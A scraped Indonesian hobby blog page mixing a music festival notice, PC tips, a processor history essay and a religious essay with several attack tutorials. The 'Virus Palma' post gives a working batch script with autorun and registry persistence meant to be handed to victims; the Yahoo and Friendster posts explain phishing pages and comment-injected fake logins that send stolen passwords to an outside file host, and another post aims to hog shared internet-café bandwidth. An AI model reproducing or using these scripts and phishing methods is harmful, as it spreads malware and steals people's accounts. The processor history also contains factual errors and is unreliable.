Solo International Etnic Music


SOLO INTERNATIONAL ETHNIC MUSIC (SIEM) DIGELAR LAGI

Setelah sukses dilaksanakan pertama kali pada tahun 2007, Solo International Ethnic Music (SIEM) Festival akan diadakan lagi pada tahun ini. Kali ini, Pamedan Pura Mangkunegaran Surakarta (Kompleks salah satu kerajaan di kota Solo) akan dijadikan venue festival.


Image


SIEM yang akan dilaksanakan pada 28 Oktober - 1 Oktober 2008 dari pukul 20.00 hingga 23.30, itu akan mengundang pemusik etnik dari Bulgaria, India, Jepang, New Zeland, dan Senegal. Sedangkan dari dalam negeri akan ditampilkan musisi dari Selayar, Minang, Kalimantan Timur, Banyuwangi, Bali, Bandung, Cirebon, Yogyakarta, Flores, Surabaya, Solo dan Irian Barat. Direncanakan akan tampil pula dalam festival ini, Ebiet G. Ade, Letto, Balawan dan Syaharani yang tampil dengan komposisi etnik mereka. Keseluruhan penampil dalam festival tahunan ini merupakan rekomendasi dari Prof.Dr.Rahayu Supanggah, S.Kar (pakar etnomusikologi, musisi dan pengajar Institut Seni Indonesi - ISI Surakarta) dan Gilang Ramadhan (musisi), yang ditunjuk panitia SIEM 2008 sebagai kurator.

Selain mengadakan pertunjukan musik di atas panggung SIEM 2008 juga mengadakan workshop dan eksplorasi dengan delegasi lain. Interaksi ini tidak saja menghasilkan diharapkan muncul karya kreatif, namun juga memperluas jaringan atau relasi musisi etnik dalam skala internasional. "Venue workshop sengaja dipilih tempat-tempat yang memiliki nilai historis, dan akan diikuti sineas dari berbagai kota. Workshop ini juga disengaja untuk menjadi inspirasi lahirnya film musik etnik," ujar Putut H Pramono, Ketua Bidang Festival SIEM 2008.

Persoalan musik etnik di Indonesia akan dibahas dalam sebuah rangakaian konferensi dari berbagai sudut pandang dan disiplin di SIEM 2008. Berbagai aspek dalam musik etnik, dari sudut pandang ekologi/ lingkungan, etnik sebagai basis penciptaan kreatif, etnik dalam perspektif ekonomi dan industri akan dibahas dalam rangkaian festival.

Masih dalam rangkaian acara festival, pada tangal 16 Agustus, setiap delegasi SIEM 2008 akan menanam pohon yang disediakan panitia di kota Solo. Selain itu, festival akan melibatkan masyarakat dalam Gerakkan Resik-resik Kutho (Bersih-bersih Kota) di lokasi venue festival Pura Mangkunegaran hingga radius 1 Km.

Sebagai bentuk apresiasi terhadap kesetiaan profesi para musisi tradisional, SIEM 2008 akan memberikan penghargaan bagi, kelompok karawitan, kroncong, cokekan dan musisi perseorangan. Penghargaan itu didasarkan atas kesetiaan para seniman pada profesi seni mereka.
Pada pelaksaan festival pertama tahun 2007 lalu, SIEM yang diadakan di kawasan cagar budaya Benteng Vastenburg Solo saat itu ditonton lebih dari 50.000 orang dari berbagai kota selama sepekan pelaksanaan. Kesuksesan itu membuat Pemerintah Kota Surakarta mendorong dan memfasilitasi agar SIEM tetap hadir di tengah-tengah masyarakat secara berkelanjutan.(***)


info: siemfestival.com
Posted in | 0 komentar

Hacking Bandwidth Warnet

Pernah kan sohib2 ngerasain pas lagi diwarnet, walaupun sepi ga ada user tapi buat browsing ttp lemot alias lelet,… itu karena tiap bilik/room udah di batasi bitrate n bandwithnya kang ma yang punya warnet… nah sekarang gue pnya trik untuk mengatasi masalah tersebut caranya :

1). Buka Browser Mozilla Firefox…
2). Pada Address Bar Ketik : ABOUT:CONFIG
3). Carilah string speti gini : ( pastikan semua srting dibawah “TRUE”)

contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False

4). Bwat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan NEW>>INTEGER

5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : ABOUT:BLANK

. Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCEDfire-fox.jpg

oya.. yg diatas itu buat firefox versi lama..

dan untuk firefox ver.2 atau 3 ga perlu..^.^..

9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan

10).Kemudian Tekan OK Lalu REFRESH ( F5 )
11).Masuk Ke Link Ini :klik sini atau :klik di sini

12).Download Software SwitchProxy Tool Versi 1.3.4 dulu
13).Setelah Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul

15).Tutup Semua Browser Mozilla FireFox,
16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi

17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.

18). Sekarang Browser Mozilla Siap Untuk Digunakan…….

:: NOTE :: — Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet

– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang dirimu Pakai

– Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan “BROADBAND / VSAT”

moga2 berhasil yow kang..cz aqu udah nyoba..:)
Posted in | 0 komentar

maximalkan My Document

folder My Documents emang disediain untuk nampung semua document lo,
jadi dengan terpusatnya semua document lo maka manage-nya juga jadi
gampang pada windows xp lokasi my documents secara default terletak
pada c:\Documents and Settings\username\My Documents
tapi kalo lo orang yang sering format2x hardisk terutama gonta ganti
OS (operating system) pasti drive c:\ yang sering lo format dan
akibatnya folder my documents jadi keformat juga padahal pada foder
ntu banyak file2 penting lo seperti Jurnal, Laporan, program2 lo, dsb
dan biasanya juga, pas lo ngeformat drive c:\ lo pasti lupa mindahin
isi dari My Documents ke lokasi lainnya

untuk ngatasi itu nih caranya :
1. buka Explorer
2. click kanan My Documents pilih Properties
3. pada kolom Target masukin alamat My Documents yg baru,
misalnya d:\file_ku
jadi sekarang lokasi My Documents lo ada di folder d:\file_ku
dan elo sekarang gak usah susah2x lagi ngamanin My Documents kalo
lo mau format drive c:\
4. click OK, maka akan muncul konfirmasi apakah lo akan memindahkan
isi My Documents dari lokasi lama (c:\Documents and Settings\
username\My Documents) ke lokasi baru (d:\file_ku), pilih Yes
kalo lo pengen mindahin isi-nya sebaliknya pilih No

gampang to kang???????
Posted in | 2 komentar

Virus Palma

tprasetyo96.blogspot.com present :
Membuat virus PALMA (jembatan Kahayan) dengan Notepad.

Pernah ketemu sama virus palma ?? atau jembatan kahayan ?
mungkin virus ini cuma nyebar di lokalan aja, belum nyebar kemana2 !

setelah di pelajari, kira2 scripnya kayak di bawah ini.
mau nyoba bikin ? ok !!

Buka Notepad kesayangan kamu,trus copy-paste script dibawah ini


@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000/f

lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)

buat Autorun.inf dengan script (pada notepad baru) kemudian save dengan format .inf :

[autorun]
open=nama_file.bat

lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)

file-file tersebut harus dalam 1 folder, buat folder ini hiden & read-only
hal tersebut agar foldernya tak terlihat & tak dapat dihapus..

Burning di CD biasanya Auto play CD adalah cara ampuh untuk menularkan Virus...
selesai, tinggal di berikan pada korban.

kalo ada komputer yang hang karna virus ini , bukan tanggung jawab saya...
Posted in | 0 komentar

Hack Yahoo

Trik Hacking Email Yahoo Dengan Menggunakan Bahasa HTML dan JavaScript

Pernahkah anda membuka email Yahoo tiba-tiba email anda mengalami bahwa email anda Expire dengan keterangan sebagai berikut "Your login session has expired" ?

kemungkinan besar hal itu terjadi di karenakan apabila anda membuka dua jendela browser dan
anda telah logout di browser yang satunya trus mo ngececk email yang lain di browser yang
satunya.

Nah dengan trik inilah saya mencoba mengembangkannya untuk ngehack email seseorang, tapi
anda harus ingat bahwa email yang menjadi target adalah email Yahoo, selain dari email itu
anda tidak bisa berbuat apa-apa disana.

Baiklah saya akan menjelaskan sedikit trik ini, yang perlu di perhatikan antara lain:

1. Anda harus memiliki E-Mail Yahoo dan alamat email hasil penyimpan password tentunya
2. Mengerti cara mengirim email dengan Yahoomail
3. Mengerti sedikit tentang JavaScript dan HTML
4. Memiliki website yang akan di jadikan basis hacking kita (Ingat!!!!! website tersebut
website anda harus tidak memiliki iklan dalam bentuk apapun baik itu popup maupun ba-
ner) tujuannya agar si penerima email tidak curiga.

Nah.jika anda telah memenuhi ke 4 syarat di atas maka kita bisa memulai untuk mencoba aksi
kita; Lets Go!!
Ini dia bumbu-bumbu yang perlu di persiapkan dalam meracik script kita itu:
Yang perlu di persiapkan antara lain ada 3 buah script antara lain

1. yahoo.html
2. mail.html
3. file.html

Saya juga menjelaskan beberapa trik jika anda sulit untuk mencari webhosting yang ngga ada
iklannya, anda bisa membuat acoount di http://geocities.com dan simpan ketiga file di atas
dengan ekstensi .txt jangan dengan .htm atau .html jadi nama file anda hanya di ubah
ektensinya ajah menjadi yahoo.txt mail.txt file.txt dengan demikian geocities.yahoo.com
tidak menyertakan script iklan nya. Heheheheeh mari kita lihat apa isi yang terkandung di
dalam ketiga file itu.

--=================== File yahoo.txt atau yahoo.html ======================--

Cari lah script berikut dalam file yahoo.txt yang saya sertakan dalam tutorial ini

Your login session has expired.



Re-login to Yahoo! Mail

Why does my session expire?

Login sessions expire for two reasons.

For your security, your Yahoo! Mail session expires a maximum of eight hours after you have logged in. If you have chosen in your Yahoo! User Information to be prompted for a password more frequently than every eight hours, your session will expire after the specified amount of time.
If you do not accept the cookies set on login or your computer is not configured to accept cookies, your session will expire almost immediately. We use cookies (small pieces of site information) to assist us in user authentication and in saving configuration information. Cookies are required for Yahoo! Mail.
If you see this message immediately after logging in, you should check the following:
Check to see that your computer system time is accurate. Cookies are time sensitive and may not work if your computer date is incorrect by a large amount.
Make sure that your browser is configured to accept cookies or that you agree to accept cookies during the login process.
Turn off any third party programs or control panels that automatically reject cookies.
Re-login to Yahoo! Mail

<--Akhir dari script Anda--> mail.txt <-== di ubah ke alamat url anda --=================== File mail.txt atau mail.html ======================-- Mari kita lihat isi yang terkandung dalam mail.txt atau mail.html
Yang perlu anda ganti adalah alamat emailnya an_dre@hackermail.com trus website nya http://geocities.com/b0gx/file.txt Ganti emailnya dengan email anda trus homepagenya ganti dengan homepage anda Nah ini dia cara mengirimkan emailnya anda lihat gambar di bawah ini okeh....



Trus pastekan ke jendela baru, dan kirimkan ke target yg mau kita hack nah tinggal kita tunggu ajah
si korban membuka email nya
ketika si korban membuka emailnya maka akan tampil seperti ini



Nah ketika korban mengklik tulisan My Photo maka akan tampil seperti ini


Nah tinggal kita buka email yg menampung password yg telah kita kirimkan ke korban dan kalo berhasil
maka kita akan panen password hehehhehe
Sekian dulu tutorial ini semoga bisa memberikan manfaat bagi yg membutuhkannya
Posted in | 0 komentar

Hack FS.

tprasetyo96.blogspot.com present :
cara ini tidak boleh digunakan untuk beberapa ketika karena telah diblok oleh friendster dan kini ia boleh digunakan semula

the steps are



Code:










1st step
copy the code above n paste in ur target profile comment box and submit>

2nd step
wait for ur target to approve the comment sent by u
When ur target open the windows containig ur comment ,it will outumaticly redirect the comment page to login page which is fake.as ur target loging in using the fake login form, their username and password will be saved to http://h1.ripway.com/xcode/friendster_2.txt

3rd step
go to

http://h1.ripway.com/xcode/friendster_2.txt

to look for the username n password

4th step
to log in with ur target username,it is better to use internet explorer rather the firefox or other web browser

5th step
before u can log in with ur target username,disable the shockwave flash object add-ons.how to do this= u open this address first

http://h1.ripway.com/xcode/tesrt.swf

then follow this step:

http://h1.ripway.com/xcode/guide.doc


this is the way i know to get the password and username

if any one have diffucility just leave me comment in this forun
https://login.yahoo.com/config/login_verify2?.intl=id&.src=ym
moga berhasil !!!!!!!!!!!!!!!!!!!!!!
Posted in | 11 komentar

Sejarah AMD



Perkembangan kecepatan processor, sebenarnya sudah dirancang berpuluh-puluh tahun yang lampau.

Bayangkan jika sebuah transistor berukuran 1 cm2, berapa besar ruang yang dibutuhkan untuk meletakkan sebuah komputer? Padahal, dalam sebuah komputer, terutama dalam processor, terdapat jutaan transistor. Pada tahun 1980-an, processor Pentium 486 memiliki 275.000 transistor, sedangkan Pentium II memiliki sedikitnya 7,5 juta transistor. Tak kurang dari 40 juta transistor ada dalam sebuah processor Pentium 4 atau Athlon XP. Bayangkan, jika terdapat 40 juta transistor pada sekeping processor selebar 5 cm2, seberapa besar, atau tepatnya seberapa mungil, ukuran satu buah transistor?

Jumlah transistor berbanding lurus dengan kecepatan processor. Semakin banyak transistor dalam sebuah processor, semakin tinggi pula kecepatan processor tersebut. Sebab, semakin banyak transistor, semakin besar pula kemampuan menjalankan instruksi paralel dalam setiap detik. Jika processor 486 “hanya” bisa menjalankan 20 MIPS (Million Instruction Per Second), maka Pentium 4 mampu menjalankan 1,5 juta MIPS.

Dalam perkembangannya, processor selalu mengalami peningkatan kinerja. Bukan hanya produk Intel yang bernama Pentium, tetapi juga processor AMD. Peningkatan kinerja ini selalu berdasarkan perhitungan yang matematis. Perhitungan matematis inilah yang disebut sebagai Hukum Moore. Dalam Hukum Moore disebutkan, bahwa jumlah transistor dalam sebuah chip akan berlipat ganda setiap dua tahun.

Hukum Moore dikemukakan oleh Gordon Moore, peraih gelar PhD bidang fisika dan kimia dari Caltech. Saat bekerja di Fairchild Semiconductor, ia menulis sebuah artikel berjudul “Cramming More Components Onto Integrated Circuits” di majalah Electronics No. 8 Volume 38 pada 19 April 1965. Tulisannya inilah yang disebut sebagai Hukum Moore.

Gordon Moore bersama Robert Noyce mendirikan Intel pada tahun 1968. Tak heran jika kini Gordon Moore dikenal sebagai salah satu orang terkaya di dunia. Betapa tidak, berdasarkan data riset Mercury Research pada tahun 2003, produk Intel menguasai 83,6% pasar processor dunia yang bernilai jutaan dolar AS. Meski Gordon Moore bukan penemu transistor, gagasan yang dilontarkan mengenai kecenderungan peningkatan pemakaian jumlah transistor pada integrated circuit (IC) telah memberikan sumbangan besar bagi dunia teknologi informasi.

Banyak kalangan yang sempat diragukan sampai kapan Hukum Moore bisa dianggap valid. Namun, sejak Intel memproduksi chip 70-megabit dengan lebih dari satu setengah miliar transistor berteknologi 65 nanometer (nm), kepercayaan semakin meningkat. Hukum Moore ternyata masih relevan dalam perkembangan processor saat ini. Bayangkan, transistor dalam teknologi 65 nm, satu nanometer sama dengan sepermiliar meter, masih memiliki saklar untuk mengaktifkan transistor sebesar 35 nm.

Proses teknologi baru ini meningkatkan jumlah transistor-transistor kecil yang dapat dimuat ke dalam sebuah chip, memberi pijakan bagi Intel untuk menghadirkan processor-processor multi-core masa depan. Proses teknologi 65 nm juga meliputi beberapa fitur unik untuk menghemat daya dan meningkatkan kinerja. Pada bulan November 2003, Intel mengumumkan penggunaan proses 65 nm untuk membuat SRAM 4-megabit. Sejak itu, Intel telah melakukan fabrikasi dari SRAM 70-megabit yang berfungsi penuh menggunakan proses ini. Sel-sel SRAM yang kecil memungkinkan bagi integrasi cache lebih besar dalam processor, yang meningkatkan kinerja.
Setiap sel memory SRAM memiliki enam transistor yang dikemas dalam bidang seluas 0.57 µm. Kira-kira 10 juta dari transistor tersebut dapat ditempatkan ke dalam satu milimeter persegi, setara dengan ukuran titik yang dihasilkan oleh pulpen.

Anti-Hukum Moore
Sebagaimana sebuah aturan buatan manusia lainnya, Hukum Moore mulai diganggu dan digugat. Menurut Hukum Moore, jumlah transistor dalam sebuah chip akan berlipat ganda setiap dua tahun. Penggandaan ini menghasilkan lebih banyak fitur, peningkatan kinerja, dan penurunan biaya untuk setiap transistor. Namun seiring dengan kian mengecilnya ukuran transistor, peningkatan daya dan panas menjadi masalah yang kian berkembang.

Oleh karena itu, implementasi fitur-fitur, teknik, dan struktur baru mutlak diperlukan. Intel menjawab dengan mengintegrasikan fitur-fitur hemat daya ke dalam proses teknologi 65 nm. Fitur-fitur ini berperan penting dalam menghadirkan komputasi dan produk-produk komunikasi yang memiliki efisiensi daya di masa depan.
Teknologi strained silicon dari Intel —kali pertama diimplementasikan pada proses teknologi Intel 90 nm—dikembangkan lagi pada teknologi 65 nm. Generasi kedua dari teknologi strained silicon meningkatkan kinerja transistor antara 10 sampai 15 persen tanpa memperbesar kebocoran.

Singkatnya, transistor-transistor ini dapat memperkecil kebocoran sebanyak empat kali dibandingkan dengan transistor-transistor 90 nm. Akibatnya, transistor-transistor pada proses teknologi 65 nm memiliki peningkatan kinerja tanpa peningkatan kebocoran yang signifikan.

Transistor-transistor Intel 65 nm memiliki lebar gerbang lebih kecil sebesar 35 nm dan ketebalan gerbang oksida sebesar 1,2 nm, yang kombinasinya menghasilkan peningkatan kinerja dan penurunan kapasitas gerbang. Penurunan kapasitas gerbang pada akhirnya akan menurunkan daya aktif chip. Proses terbaru ini juga mengintegrasikan delapan lapis cooper yang saling terhubung dan menggunakan suatu materi dielektrik “lowk” yang meningkatkan kecepatan sinyal di dalam chip dan mengurangi konsumsi daya chip.

Bagian ke 2

Intel juga telah mengimplementasikan “sleep transistor” dalam SRAM 65nm. Transistor-transistor tersebut akan memadamkan aliran yang ada ke blok-blok dari SRAM ketika mereka tidak sedang digunakan, yang secara signifikan membatasi sumber konsumsi daya pada chip. Fitur ini bermanfaat bagi perangkat yang menggunakan tenaga baterai, seperti laptop.

Dalam tulisannya, Moore meramalkan, pemakaian transistor pada keping IC meningkat secara eksponensial dua kali lipat setiap tahun. Prediksi Moore dikenal sebagai Hukum Moore dan terbukti hingga saat ini. Namun, kecenderungan tersebut terus menurun dan mulai dipertanyakan ketepatannya, sehingga peningkatan jumlah IC secara eksponensial berlangsung rata-rata menjadi setiap 18 bulan.

Namun Gordon Moore mempertahankan pendapatnya dan membantah bahwa Hukum Moore tidak lagi relevan dalam penjelasannya di depan International Solid State Circuits Conference (ISSCC) pada 10 Februari 2003 dalam presentasi berjudul No “Exponential Forever, But We Can Delay Forever”. Moore mengakui, prediksinya tidak selamanya akurat. Meski demikian, Hukum Moore terus dipelajari dan menjadi kajian yang penting.

Evolusi Hukum Moore
Hukum Moore bukan sekadar prediksi dan hasil pengamatan belaka. Saat ini, Hukum Moore telah dijadikan target dan tujuan yang ingin dicapai dalam pengembangan industri semikonduktor. Peneliti di industri prosesor berusaha mewujudkan Hukum Moore dalam pengembangan produknya.

Secara tidak langsung, Hukum Moore menjadi umpan balik (feedback) untuk mengendalikan laju peningkatan jumlah transistor pada keping IC. Hukum Moore telah mengendalikan semua orang untuk bersama-sama mengembangkan processor.
Di sisi lain, munculnya processor dual-core yang memiliki 1,7 miliar transistor di dalamnya membuka babak baru pembahasan Hukum Moore. Kedatangan processor dual-core, memunculkan pergeseran ramalan dalam Hukum Moore.

Sebab, clock dan kecepatan processor sudah bisa dikatakan sulit untuk berkembang lagi. Jika dikembangkan, maka konsekuensinya adalah panas berlebihan dan desain processor yang sulit diterapkan. Apalagi, bus integrator hingga saat ini belum ada. Selain itu pengembangan lebih lanjut, tanpa adanya rancang ulang kontruksi processor hanya melahirkan bottleneck dalam CPU.

Selain itu, processor dual-core juga sudah melejit dalam waktu kurang dari dua tahun, sejak processor versi sebelumnya. Mungkin, yang bisa dikaitkan dengan Hukum Moore adalah kecepatannya saja yang masih bisa diramalkan. Mengenai jumlah transistor dalam sebuah processor, tampaknya sudah tidak relevan lagi.
Jadi, Hukum Moore memang sudah sepatutnya dipertanyakan relevansinya dengan perkembangan processor yang semakin melejit. Atau setidaknya, perlu dimunculkan Hukum Moore v2.

Catatan Penting Kilas Balik Perjalanan Processor
Ada baiknya kita menyimak kilas balik perjalanan processor, untuk melihat teknologi yang berkembang dari masa ke masa.

1970-an
Diawali Intel seri MCS4, sebuah processor yang menjadi cikal bakal i4040. Processor 4 bit ini direncanakan pada kalkulator pesanan sebuah perusahaan Jepang, namun kinerjanya lebih hebat dari yang diharapkan. Sehingga Intel membeli hak guna dari perusahaan Jepang tersebut untuk perkembangan dan penelitian lebih lanjut.
Kemudian, muncul processor 8 bit pertama i8008. Namun, kurang berhasil karena multivoltage. i8080 adalah processor dengan register internal 8-bit, bus eksternal 8-bit, dan memory addressing 20-bit (dapat mengakses 1 MB memori total), dan modus operasi REAL. Muncul juga processor MC6800 dari Motorola pada tahun 1974 dan Z80 dari Zilog pada 1976. Selain itu, processor-processor lain, misalnya seri 6500 buatan MOST, Rockwell, Hyundai, WDC, NCR, dan sebagainya juga sudah mulai tersedia di pasaran industri.

Seri 8085 keluar pada 1977, dengan clock generator onprocessor dan menggunakan single voltage. Dilanjutkan dengan i8086, processor dengan register 16-bit, bus data eksternal 16-bit, dan memory addressing 20-bit. Saat diluncurkan pada tahun 1978, i8086 menggunakan teknologi HMOS, yang komponen pendukungnya langka, sehingga sangat mahal. Berikutnya muncul 80186 dan i80188 yang sudah dikemas dalam bentuk bujursangkar dengan 17 kaki persisi (PLCC/LCC) atau 2 deret kaki persisi (PGA). i80186 mengawali chip DMA dan interrupt controller yang disatukan ke dalam processor.

1980-an
IBM memproduksi processor dengan arsitektur RISC 32-bit pertama untuk PC. Namun karena software masih langka, IBM PC ini tidak bisa optimal. Intel membuat i80286, dengan register 16-bit, bus eksternal 16-bit, dan mode terbatas yang disebut mode STANDARD dengan memory addressing 24-bit yang mampu mengakses memory 16 MB serta kompatibel dengan seri sebelumnya.

Kemudian di tahun 1985, Intel meluncurkan desain processor yang baru, yakni i80386. Sebuah prosesor 32-bit, bus data eksternal 32-bit, dan kompatibilitas dengan generasi sebelumnya, serta mampu mengakses memory hingga 4 GB. Chip ini dikemas dalam bentuk Pin Grid Array (PGA).

Pada tahun 1989, Intel meluncurkan i80486DX. Karena banyak permintaan pasar processor murah, maka Intel meluncurkan i80486SX yang merupakan processor i80486DX tanpa sirkuit FPU.

AMD dan Cyrix kemudian membeli desain i80386 dan i80486DX untuk membuat processor yang kompatibel dengan Intel. Jadi, AMD dan Cyrix tidak melakukan proses perancangan berdasarkan chip seri sebelumnya, melainkan berdasarkan rancangan chip yang sudah ada untuk membuat chip yang sekelas.

Tahun 1990-an
Intel meluncurkan Pentium, dengan struktur PGA lebih besar dan kecepatan lebih tinggi. Pada generasi Pentium, Intel telah menerapkan kemampuan pipeline yang biasanya hanya ada dalam processor RISC.

Tahun 1995, Pentium Pro mulai muncul. Ada inovasi baru dengan disatukannya cache memory ke dalam processor, sehingga menuntut adanya socket 8. Pin-pin processor ini terbagi 2 grup, 1 untuk cache memory, dan 1 lagi untuk processor-nya sendiri. Desain ini memungkinkan efisiensi penanganan instruksi 32-bit.

Dilanjutkan tahun 1996, Pentium MMX keluar. Sampai sekarang belum ada definisi jelas mengenai MMX. Ada keterbatasan desain pada MMX, yakni modul MMX ditambahkan dalam Pentium tanpa rancang ulang, sehingga terpaksa unit MMX dan FPU sharing. Dan saat FPU aktif, maka MMX nonaktif, semikian sebaliknya. Sehingga Pentium MMX dalam mode MMX tidak kompatibel dengan Pentium.

Di sisi lain, AMD K5-PR75 mulai melejit. Sebuah “clone” i80486DX dengan kecepatan internal 133 MHz dan clock bus 33 MHz. Lalu di tahun 1997, Intel meluncurkan Pentium II, Pentium Pro dengan teknologi MMX yang memiliki beberapa inovasi baru. Pertama, cache memory tidak menjadi 1 dengan inti processor seperti Pentium Pro. Inovasi kedua, adanya SEC (Single Edge Cartidge) yang memungkinkan pemasangan processor Pentium Pro di slot SEC dengan adapter khusus. Kedua inovasi ini memungkinkan processor untuk bekerja secara lebih optimal.

Tahun 2000-an
Perjalananan perkembangan processor masih terus berlanjut. Intel meluncurkan processor dengan kemampuan Hyper-Threading, dan seterusnya. Sedangkan AMD mulai meluncurkan teknologi 64-bit dan seterusnya.

Akhir perjalanan ini sepertinya tidak akan tercapai. Sebab, teknologi tak berhenti seiring usia peradaban manusia.

Posted in | 0 komentar

security di xp tanpa bantuan tool

kalo lo biasa make tools security,macemnya TweakXP, PC Security,
Folder Guard dsb, sebenernya lo bisa ngelakuin sendiri semua fungsi
kemanan seperti yg dilakuin sama tools tersebut dengan syarat OS yang
lo pake buka Windows XP Home Edition, caranya pada menu Run (Win+R)
ketik gpedit.msc trus klik OK or enter deh, pada menu utama lo bisa
pilih bagian service n lo bisa liat semua services yg ada pada
windows kayak autorun cdroom, hide startmenu, hide drive letter,dsb

gw gak bakalan ngejelasin semua fungsi itu satu2 soalnya banyak amat
n perlu diingat semua services yg ada diwindows ada disini jadi kalo
lo mo kenal windows,kenalin gpedit.msc and pelajarin control panel




note : gpedit.msc cuman bisa dijalanin dari menu Run, JADI JANGAN
PERNAH MEN-DISABLE RUN MENU FROM THE START MENU, gw pernah ngelakuin
hal ini n akhirnya gw gak bisa ngegunain Run menu dan akibatnya
gpedit.msc gak pernah bisa diakses padahal untuk meng-unable Run menu
harus menggunakn gpedit.msc....jadi kalo hal ini terjadi siap-siap
install ulang Windows





note lagi : gpedit.msc sangat powerfull bahkan bisa mendisable
hardware yg lo punya (disable cdroom, harddisk, floppy ect) karena
ntu gunakan secara bertanggung jawab.........
Posted in | 0 komentar

Apakah Dajjal Itu Ada ????

Adakah Dajjal?

Keberadaan Dajjal merupakan salah satu topik yang menarik dan layak kaji. Pasalnya, masalah yang satu ini sering menjadi ‘isu kondisional’ sejak dahulu kala. Simpang siur pendapat pun sering kali bergulir di tengah umat, tentunya dengan berbagai macam persepsi dan landasan berpikir yang berbeda. Tak ayal, kontroversi ini menjadikan bingung banyak orang yang notabene awam.

Sebelum menelusuri kontroversi sikap seputar Dajjal, tentunya amat penting untuk didudukkan terlebih dahulu hakikat Dajjal yang sedang dipermasalahkan ini. Karena hukum terhadap sesuatu, merupakan cabang dari penggambarannya. Bagaimana mungkin seseorang bisa menghukumi bahwa Dajjal itu ada atau tidak, sementara belum jelas baginya hakikat Dajjal yang sedang dipermasalahkan.

Hakikat Dajjal yang Dipermasalahkan
Dajjal yang sedang dipermasalahkan keberadaannya itu adalah seseorang dari bangsa manusia yang Allah Subhanahu wa Ta’ala munculkan di akhir zaman (dengan segala kekuasaan dan hikmah-Nya), sebagai fitnah (ujian) besar bagi umat manusia di muka bumi ini1, dan sebagai salah satu pertanda kuat semakin dekatnya hari kiamat2. Bentuk fisik Dajjal adalah: matanya buta sebelah (yang dengannya disebut Al-Masih), pada dahinya tertulis huruf (ك ف ر) yang berarti kafir di mana tulisan itu bisa dibaca oleh siapa saja yang di hatinya ada keimanan3, berambut sangat keriting4, bertubuh besar, dan sudah ada saat ini di sebuah pulau yang ada di tengah lautan (arahnya sebelah timur kota Madinah), dalam keadaan dibelenggu dengan belenggu besi yang amat kuat5.
Ketika muncul, dia mengaku sebagai Allah Subhanahu wa Ta’ala (padahal sesungguhnya Allah Subhanahu wa Ta’ala tidak buta sebelah seperti dia) dan menyeru umat manusia untuk menyembah dirinya. Allah Subhanahu wa Ta’ala kuasakan bagi Dajjal untuk membawa sesuatu seperti Jannah (surga) dan Naar (neraka). Jannah Dajjal hakikatnya adalah Naar Allah, dan Naar Dajjal hakikatnya adalah Jannah Allah6.
